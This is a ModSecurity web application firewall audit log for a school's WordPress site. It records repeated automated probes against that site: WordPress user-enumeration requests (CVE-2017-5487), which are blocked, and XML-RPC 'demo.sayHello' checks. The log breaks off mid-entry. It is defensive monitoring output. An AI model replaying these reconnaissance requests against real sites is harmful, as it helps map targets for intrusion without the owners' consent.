Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b68711f-Z-- --735ec44d-A-- [17/May/2025:03:46:37 +0700] aCekLXyxdQCiyU1ENFchgQAAAAc 103.236.140.4 55438 103.236.140.4 8181 --735ec44d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --735ec44d-C-- demo.sayHello --735ec44d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --735ec44d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428397295182 6148 (- - -) Stopwatch2: 1747428397295182 6148; combined=4429, p1=547, p2=3645, p3=30, p4=34, p5=101, sr=75, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --735ec44d-Z-- --5561343f-A-- [17/May/2025:03:46:37 +0700] aCekLXyxdQCiyU1ENFchggAAAAg 103.236.140.4 55440 103.236.140.4 8181 --5561343f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5561343f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5561343f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428397536891 2457 (- - -) Stopwatch2: 1747428397536891 2457; combined=1176, p1=426, p2=723, p3=0, p4=0, p5=27, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5561343f-Z-- --3bf15d48-A-- [17/May/2025:03:46:42 +0700] aCekMnyxdQCiyU1ENFchhAAAAAs 103.236.140.4 55446 103.236.140.4 8181 --3bf15d48-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.11 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3bf15d48-C-- demo.sayHello --3bf15d48-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bf15d48-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428402883830 6370 (- - -) Stopwatch2: 1747428402883830 6370; combined=4453, p1=660, p2=3557, p3=31, p4=35, p5=99, sr=108, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bf15d48-Z-- --95d47220-A-- [17/May/2025:03:48:13 +0700] aCekjRKi5m5upc8uMd6eDQAAAME 103.236.140.4 55456 103.236.140.4 8181 --95d47220-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --95d47220-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95d47220-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428493420664 2966 (- - -) Stopwatch2: 1747428493420664 2966; combined=1430, p1=556, p2=847, p3=0, p4=0, p5=27, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95d47220-Z-- --52a2172b-A-- [17/May/2025:03:48:18 +0700] aCekknyxdQCiyU1ENFchhgAAAA4 103.236.140.4 55464 103.236.140.4 8181 --52a2172b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --52a2172b-C-- demo.sayHello --52a2172b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --52a2172b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428498616137 5783 (- - -) Stopwatch2: 1747428498616137 5783; combined=4192, p1=592, p2=3382, p3=28, p4=31, p5=94, sr=123, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52a2172b-Z-- --2e856961-A-- [17/May/2025:03:54:52 +0700] aCemHHyxdQCiyU1ENFchjwAAAAk 103.236.140.4 55512 103.236.140.4 8181 --2e856961-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e856961-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e856961-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428892562820 2779 (- - -) Stopwatch2: 1747428892562820 2779; combined=1238, p1=442, p2=766, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e856961-Z-- --bad2ab60-A-- [17/May/2025:03:54:56 +0700] aCemIBKi5m5upc8uMd6eEQAAAMg 103.236.140.4 55516 103.236.140.4 8181 --bad2ab60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bad2ab60-C-- demo.sayHello --bad2ab60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bad2ab60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428896622597 5654 (- - -) Stopwatch2: 1747428896622597 5654; combined=4152, p1=529, p2=3376, p3=29, p4=31, p5=106, sr=78, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bad2ab60-Z-- --62a2d17e-A-- [17/May/2025:03:55:54 +0700] aCemWnyxdQCiyU1ENFchkgAAAA4 103.236.140.4 55522 103.236.140.4 8181 --62a2d17e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.143 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --62a2d17e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62a2d17e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428954565172 3294 (- - -) Stopwatch2: 1747428954565172 3294; combined=1397, p1=475, p2=891, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62a2d17e-Z-- --29214609-A-- [17/May/2025:03:55:59 +0700] aCemX3yxdQCiyU1ENFchlwAAABc 103.236.140.4 55538 103.236.140.4 8181 --29214609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.143 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --29214609-C-- demo.sayHello --29214609-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --29214609-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428959626765 6092 (- - -) Stopwatch2: 1747428959626765 6092; combined=4376, p1=568, p2=3541, p3=58, p4=34, p5=102, sr=77, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29214609-Z-- --9c7f0a57-A-- [17/May/2025:03:56:29 +0700] aCemfXyxdQCiyU1ENFchmQAAAAA 103.236.140.4 55542 103.236.140.4 8181 --9c7f0a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c7f0a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c7f0a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428989099523 3170 (- - -) Stopwatch2: 1747428989099523 3170; combined=1355, p1=467, p2=858, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c7f0a57-Z-- --96effa67-A-- [17/May/2025:03:56:34 +0700] aCemgnyxdQCiyU1ENFchmwAAAAI 103.236.140.4 55546 103.236.140.4 8181 --96effa67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --96effa67-C-- demo.sayHello --96effa67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --96effa67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428994588965 5268 (- - -) Stopwatch2: 1747428994588965 5268; combined=3942, p1=516, p2=3213, p3=29, p4=31, p5=91, sr=89, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96effa67-Z-- --bf5f382d-A-- [17/May/2025:03:58:32 +0700] aCem-BKi5m5upc8uMd6eEgAAAMk 103.236.140.4 55558 103.236.140.4 8181 --bf5f382d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bf5f382d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf5f382d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429112846913 3373 (- - -) Stopwatch2: 1747429112846913 3373; combined=1430, p1=506, p2=895, p3=0, p4=0, p5=29, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf5f382d-Z-- --78a90f0f-A-- [17/May/2025:03:58:38 +0700] aCem_nyxdQCiyU1ENFchoAAAAAs 103.236.140.4 55566 103.236.140.4 8181 --78a90f0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78a90f0f-C-- demo.sayHello --78a90f0f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78a90f0f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429118472162 6054 (- - -) Stopwatch2: 1747429118472162 6054; combined=4352, p1=550, p2=3574, p3=30, p4=34, p5=96, sr=77, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78a90f0f-Z-- --d70d0852-A-- [17/May/2025:04:04:26 +0700] aCeoWgTOsBn9MSWb6WJp0wAAAJQ 103.236.140.4 55606 103.236.140.4 8181 --d70d0852-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d70d0852-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d70d0852-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429466704847 2177 (- - -) Stopwatch2: 1747429466704847 2177; combined=1055, p1=326, p2=702, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d70d0852-Z-- --0e604c76-A-- [17/May/2025:04:04:32 +0700] aCeoYHyxdQCiyU1ENFchrAAAAAc 103.236.140.4 55610 103.236.140.4 8181 --0e604c76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.210 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e604c76-C-- demo.sayHello --0e604c76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e604c76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429472905826 4109 (- - -) Stopwatch2: 1747429472905826 4109; combined=3133, p1=376, p2=2552, p3=21, p4=22, p5=96, sr=56, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e604c76-Z-- --9fc56729-A-- [17/May/2025:04:06:57 +0700] aCeo8QTOsBn9MSWb6WJp1gAAAJg 103.236.140.4 55628 103.236.140.4 8181 --9fc56729-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9fc56729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fc56729-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429617350680 3028 (- - -) Stopwatch2: 1747429617350680 3028; combined=1252, p1=422, p2=801, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fc56729-Z-- --02458b67-A-- [17/May/2025:04:07:05 +0700] aCeo-XyxdQCiyU1ENFchsAAAAA4 103.236.140.4 55632 103.236.140.4 8181 --02458b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02458b67-C-- demo.sayHello --02458b67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02458b67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: 